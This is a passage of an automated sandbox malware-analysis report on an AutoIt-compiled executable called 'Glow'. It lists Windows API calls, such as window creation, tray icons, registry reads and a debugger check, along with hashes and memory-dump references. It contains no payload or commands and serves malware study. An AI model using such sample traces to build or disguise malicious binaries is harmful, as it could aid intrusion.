                                                                                                                                                                          • Instruction Fuzzy Hash: B1C10574E04249AFCF12DFE9D841BEDBBB4AF09304F15419AE714AB7A2C7308942CB60

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1777 3835b3-383623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003835E1
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383602
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 00383616
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 0038361F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                          • Opcode ID: 7d52a04064596136af03b5d37c8912e698878f257d5a44b855c591edb89f1ede
                                                                                                                                                                          • Instruction ID: 23ee4c835fb2f24106b2904560d28a63c303935e3079f52df2959581eda3a2b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d52a04064596136af03b5d37c8912e698878f257d5a44b855c591edb89f1ede
                                                                                                                                                                          • Instruction Fuzzy Hash: 67F017B1A403957AE7214B23AD08E772FBDD7C7F51F00402BBD04A61A1C2A94881DAB8

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003C5287
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00386299
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                                                                                          • Opcode ID: 0128e8f4cb596407daaaf16e7ed00e0a98e1abb2cb2a9e574072e4424bb05481
                                                                                                                                                                          • Instruction ID: 0650363d8776752acea0429d1977f8130e2fe91a438c51ef17bf2cf277b955c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 0128e8f4cb596407daaaf16e7ed00e0a98e1abb2cb2a9e574072e4424bb05481
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F41A4714083146AC712FB20DC46FDFB7ECAF45310F104A6EF995861A2EB74EA49C796
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,OV<,003B894C,?,00449CE8,0000000C,003B89AB,?,OV<,?,003C564F), ref: 003B8A84
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003B8A8E
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 003B8AB9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                          • String ID: OV<
                                                                                                                                                                          • API String ID: 2583163307-1191810490
                                                                                                                                                                          • Opcode ID: f38cb7acf2ea42a3a47092b7387d407cabc9ec000c05c16119198dc5b189107c
                                                                                                                                                                          • Instruction ID: 219b87d39037e868603d8cd165cc12cd65f3fef0a22bb1bd3333ad1d8865c58c
                                                                                                                                                                          • Opcode Fuzzy Hash: f38cb7acf2ea42a3a47092b7387d407cabc9ec000c05c16119198dc5b189107c
                                                                                                                                                                          • Instruction Fuzzy Hash: 04012B336051605AC6276374AC867FE675D4B9273CF2A021AFB148F9D2DF70CD81C594
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003858BE,SwapMouseButtons,00000004,?), ref: 003858EF
                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003858BE,SwapMouseButtons,00000004,?), ref: 00385910
                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,003858BE,SwapMouseButtons,00000004,?), ref: 00385932
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                                          • Opcode ID: 79c01e582a8b9cb7f17b3ecde0bf96d419de33b2e6156b644d212cd4935fb98b
                                                                                                                                                                          • Instruction ID: ec7cc32d7131d9892c6ed5ea3c717d4e6a2bda625ef8362f2721f714c928a102
                                                                                                                                                                          • Opcode Fuzzy Hash: 79c01e582a8b9cb7f17b3ecde0bf96d419de33b2e6156b644d212cd4935fb98b
                                                                                                                                                                          • Instruction Fuzzy Hash: 251157B5610618FFDB229F64CC80AEEBBBCEF44764F1184A9E801E7210E3319E419B64
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00393006
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID: CALL$bn>
                                                                                                                                                                          • API String ID: 1385522511-2613667664
                                                                                                                                                                          • Opcode ID: 70b308a74d9752c4e80465190e1d62b7152115333269f1ef9edc64aef2bf81c7
                                                                                                                                                                          • Instruction ID: 7cbe58f5265e1098113e4990f6b8f3e9e4b3f3f6cc7d721befb523c6cc0ce3fd
                                                                                                                                                                          • Opcode Fuzzy Hash: 70b308a74d9752c4e80465190e1d62b7152115333269f1ef9edc64aef2bf81c7
                                                                                                                                                                          • Instruction Fuzzy Hash: EB229CB0608701AFCB16DF24C880A2BBBF5BF89314F15895DF4968B3A1D771E945CB82
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 003C413B
                                                                                                                                                                            • Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871
                                                                                                                                                                            • Part of subcall function 00383A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00383A76
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                          • String ID: X$`uD
                                                                                                                                                                          • API String ID: 779396738-2319419492
                                                                                                                                                                          • Opcode ID: c9bfe3b4f1a4f437ea2ff87eddcbcfe56ce28c200c2eac5bb97b4b267517984f
                                                                                                                                                                          • Instruction ID: 27fbb0325a35614e39c1a63363224ca3bae753abf76770f6ba837e2436ff3ef6
                                                                                                                                                                          • Opcode Fuzzy Hash: c9bfe3b4f1a4f437ea2ff87eddcbcfe56ce28c200c2eac5bb97b4b267517984f
                                                                                                                                                                          • Instruction Fuzzy Hash: 31218471A002589BDB06AF94C805BEE7BFC9F49714F00805AE545AB241DBF89A898F65
                                                                                                                                                                          APIs
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 003A09D8
                                                                                                                                                                            • Part of subcall function 003A3614: RaiseException.KERNEL32(?,?,?,003A09FA,?,00000000,?,?,?,?,?,?,003A09FA,00000000,00449758,00000000), ref: 003A3674
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 003A09F5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                          • Opcode ID: 07e2de90cbcf97e877969a4829392e50609644236907fc8ef14af480db27aeb3
                                                                                                                                                                          • Instruction ID: f386fc3ccc97a956579bf51367a1ae4a84d4ac8d4f7914bce21060d2db050e9d
                                                                                                                                                                          • Opcode Fuzzy Hash: 07e2de90cbcf97e877969a4829392e50609644236907fc8ef14af480db27aeb3
                                                                                                                                                                          • Instruction Fuzzy Hash: 35F0F63490020CB7DB0ABAA4EC4699F776CDE03350B604525B924DB9F3FB74EA16C6D0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00408D52
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00408D59
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00408F3A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 146820519-0
                                                                                                                                                                          • Opcode ID: 892ccd079bfe37ace1ea42a6d5a6d863c83683c33d0654a77df84797fcffceed
                                                                                                                                                                          • Instruction ID: d500048167811be3020c9196eddc413601f9ce5081b0606fd90faa1081e64782
                                                                                                                                                                          • Opcode Fuzzy Hash: 892ccd079bfe37ace1ea42a6d5a6d863c83683c33d0654a77df84797fcffceed
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C127B71A083019FD714DF24C584B6ABBE1FF84318F14896EE8899B392DB34E945CF96
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$_strcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 306214811-0
                                                                                                                                                                          • Opcode ID: c138ef687a150d2a0e39c0b8c69a4202b7a31ff012ec2e8002aeffca89376091
                                                                                                                                                                          • Instruction ID: c28dab8bfb9a7907e88bc6dbe35ee10b02648df6e300db3e61c16c86062f1711
                                                                                                                                                                          • Opcode Fuzzy Hash: c138ef687a150d2a0e39c0b8c69a4202b7a31ff012ec2e8002aeffca89376091
                                                                                                                                                                          • Instruction Fuzzy Hash: CFA16931604605EFCB18DF18D5D1969BBB1FF46314B6084AEE80A9F292DB35ED42CB85
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003861A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00386299
                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 0039FD36
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039FD45
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003DFE33
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3500052701-0
                                                                                                                                                                          • Opcode ID: 2dd32d4540556f40718922753a2f3884c3771796861e6ed53b2c53309a4adcfb
                                                                                                                                                                          • Instruction ID: dede99ef3e74a7246e674f4df782e8f737547395f83033f49212b9dd5a470f8a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2dd32d4540556f40718922753a2f3884c3771796861e6ed53b2c53309a4adcfb
                                                                                                                                                                          • Instruction Fuzzy Hash: EA31C571904344AFEB33CF24D885BE7BBEC9B02308F1044AED5DA97242C3745A85CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,003B97BA,FF8BC369,00000000,00000002,00000000), ref: 003B9744
                                                                                                                                                                          • GetLastError.KERNEL32(?,003B97BA,FF8BC369,00000000,00000002,00000000,?,003B5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,003A6F41), ref: 003B974E
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 003B9755
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2336955059-0
                                                                                                                                                                          • Opcode ID: b09362d1a32091758316522d2628dacc773fb868a7151f871d2ee1d97ca3d2a8
                                                                                                                                                                          • Instruction ID: f49a26e07b14f047a4286721e4523ef99281e57addca48137ab7176694889470
                                                                                                                                                                          • Opcode Fuzzy Hash: b09362d1a32091758316522d2628dacc773fb868a7151f871d2ee1d97ca3d2a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D014033620514AFCB069F99DC46DEE7769DB85334B240255FA118B590EE70DE418790
                                                                                                                                                                          APIs
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00383A3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                          • Opcode ID: 1937714ffb41e9286d423180db8d9d8d97a4faea7d19b4695ae659bed569efa5
                                                                                                                                                                          • Instruction ID: b6b83af2e4a02fa52631b14ee11db5d6d4e670efb43e26ad3bc84a11c3fb23eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 1937714ffb41e9286d423180db8d9d8d97a4faea7d19b4695ae659bed569efa5
                                                                                                                                                                          • Instruction Fuzzy Hash: E831C3705047009FD322EF34D884797BBE8FB49709F00092EE9DA87341E7B4AA48CB56
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsThemeActive.UXTHEME ref: 0038333D
                                                                                                                                                                            • Part of subcall function 003832E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003832FB
                                                                                                                                                                            • Part of subcall function 003832E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00383312
                                                                                                                                                                            • Part of subcall function 0038338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00383368,?), ref: 003833BB
                                                                                                                                                                            • Part of subcall function 0038338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00383368,?), ref: 003833CE
                                                                                                                                                                            • Part of subcall function 0038338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00452418,00452400,?,?,?,?,?,?,00383368,?), ref: 0038343A
                                                                                                                                                                            • Part of subcall function 0038338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003834BB
                                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00383377
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1550534281-0
                                                                                                                                                                          • Opcode ID: c665bdcd507c73c6481c77d1d779476e8870071208081f1014bc2838ab73edfd
                                                                                                                                                                          • Instruction ID: ca342deb317ac528e8cf82b25d0fc80fd5ba6b158c213e90e1fcacecd0eb5cae
                                                                                                                                                                          • Opcode Fuzzy Hash: c665bdcd507c73c6481c77d1d779476e8870071208081f1014bc2838ab73edfd
                                                                                                                                                                          • Instruction Fuzzy Hash: E2F05472655345AFD7027F70EE0AB643794E705B0BF004866B905491E3DBF9D1508B48
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 252777609-0
                                                                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                          • Instruction ID: b439548787ed6f9f275b06df3cc400491fcc72fcacdb5949131ce024271311a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                          • Instruction Fuzzy Hash: FD31D070A00106DFC71ECF58D490A69FBA6FB5A300B2986A5E40ACB652D732EDC1CBC0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0038CEEE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
